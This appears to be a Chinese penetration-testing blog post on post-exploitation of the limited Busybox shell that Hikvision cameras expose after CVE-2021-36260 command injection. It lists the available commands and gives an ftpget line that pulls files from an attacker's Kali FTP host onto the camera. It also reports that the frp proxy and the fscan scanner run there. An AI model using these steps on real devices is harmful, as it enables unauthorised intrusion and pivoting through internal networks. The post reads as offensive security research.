Busybox后渗透利用

简介

在内网渗透中，经常遇到海康威视摄像头，因其补丁安装比较麻烦，导致大部分摄像头都存在CVE-2021-36260命令注入漏洞，当我们获取了shell会发现其安装在busybox中，只能执行部分命令，本文针对busybox的后利用进行了研究。

安装

海康威视摄像头Busybox默认的版本为：1.26.2

下载地址：
https://busybox.net/downloads/binaries/1.26.2-i686/busybox

安装使用：

sudo curl -so /usr/bin/busybox https://busybox.net/downloads/binaries/1.26.2-i686/busybox 
sudo chmod +x /usr/bin/busybox
sudo busybox --help

推荐使用docker环境：

sudo docker pull busybox 
sudo docker -it --rm busybox

默认集成的命令

cpid, add-shell, addgroup, adduser, adjtimex, ar, arp, arping, ash, awk, base64, basename, blkdiscard, blkid, blockdev, bootchartd, brctl, bunzip2, bzcat, bzip2, cal, cat, catv, chat, chattr, chgrp, chmod, chown,chpasswd, chpst, chroot, chrt, chvt, cksum, clear, cmp, comm, conspy, cp, cpio, crond, crontab, cryptpw, cttyhack, cut, date, dc, dd, deallocvt, delgroup, deluser, depmod, devmem, df, dhcprelay, diff, dirname, dmesg, dnsd,dnsdomainname, dos2unix, dpkg, du, dumpkmap, dumpleases, echo, ed, egrep, eject, env, envdir, envuidgid, expand, expr, fakeidentd, false, fatattr, fbset, fbsplash, fdflush, fdformat, fdisk, fgconsole, fgrep, find, findfs,flash_eraseall, flash_lock, flash_unlock, flashcp, flock, fold, free, freeramdisk, fsck, fsck.minix, fstrim, fsync, ftpd, ftpget, ftpput, fuser, getopt, getty, grep, groups, gunzip, gzip, halt, hd, hdparm, head, hexdump, hostid,hostname, httpd, hush, hwclock, i2cdetect, i2cdump, i2cget, i2cset, id, ifconfig, ifenslave, ifplugd, inetd, init, inotifyd, insmod, install, ionice, iostat, ip, ipaddr, ipcalc, ipcrm, ipcs, iplink, ipneigh, iproute, iprule,iptunnel, kbd_mode, kill, killall, killall5, klogd, last, less, linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login, logname, losetup, lpd, lpq, lpr, ls, lsattr, lsmod, lspci, lsusb, lzcat, lzma, lzop, lzopcat,makedevs, makemime, man, md5sum, mdev, mesg, microcom, mkdir, mkdosfs, mke2fs, mkfifo, mkfs.ext2, mkfs.minix, mkfs.vfat, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount, mountpoint, mpstat, mt, mv, nameif,nbd-client, nc, netstat, nice, nmeter, nohup, ntpd, od, openvt, passwd, patch, pgrep, pidof, ping, ping6, pipe_progress, pivot_root, pkill, pmap, popmaildir, poweroff, powertop, printenv, printf, ps, pscan, pstree, pwd, pwdx,raidautorun, rdate, rdev, readlink, readprofile, realpath, reboot, reformime, remove-shell, renice, reset, resize, rev, rm, rmdir, rmmod, route, rpm, rpm2cpio, rtcwake, run-parts, runlevel, runsv, runsvdir, rx, script,
scriptreplay, sed, sendmail, seq, setarch, setconsole, setfont, setkeycodes, setlogcons, setserial, setsid, setuidgid, sh, sha1sum, sha256sum, sha3sum, sha512sum, showkey, shuf, slattach, sleep, smemcap, softlimit, sort, split,start-stop-daemon, stat, strings, stty, su, sulogin, sum, sv, svc, svlogd, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar, taskset, tcpsvd, tee, telnet, telnetd, test, tftp, tftpd, time, timeout, top, touch,tr, traceroute, traceroute6, true, truncate, tty, ttysize, tunctl, tune2fs, ubiattach, ubidetach, ubimkvol, ubirename, ubirmvol, ubirsvol, ubiupdatevol, udhcpc, udhcpd, udpsvd, uevent, umount, uname, uncompress, unexpand, uniq,unix2dos, unlink, unlzma, unlzop, unxz, unzip, uptime, users, usleep, uudecode, uuencode, vconfig, vi, vlock, volname, wall, watch, watchdog, wc, wget, which, who, whoami, whois, xargs, xz, xzcat, yes, zcat, zcip

上传文件

命令中发现可用ftpget通过ftp上传文件
kali开启ftp

#登录用户为系统用户，此处为kali/kali
sudo apt install vsftpd
service vsftpd start

Busybox下载文件：

ftpget -u  kali -p kali 192.168.180.190  1.txt  1.txt

代理工具

本次使用的busybox架构为x86-64

frp测试

测试证明busybox可以运行对应架构的代理工具

扫描工具

fscan

也可正常使用

Q.E.D.

简介

安装

上传文件

代理工具

frp测试

扫描工具

fscan

cmd搜索文件

Bypass360横向移动-Psexec

H1ng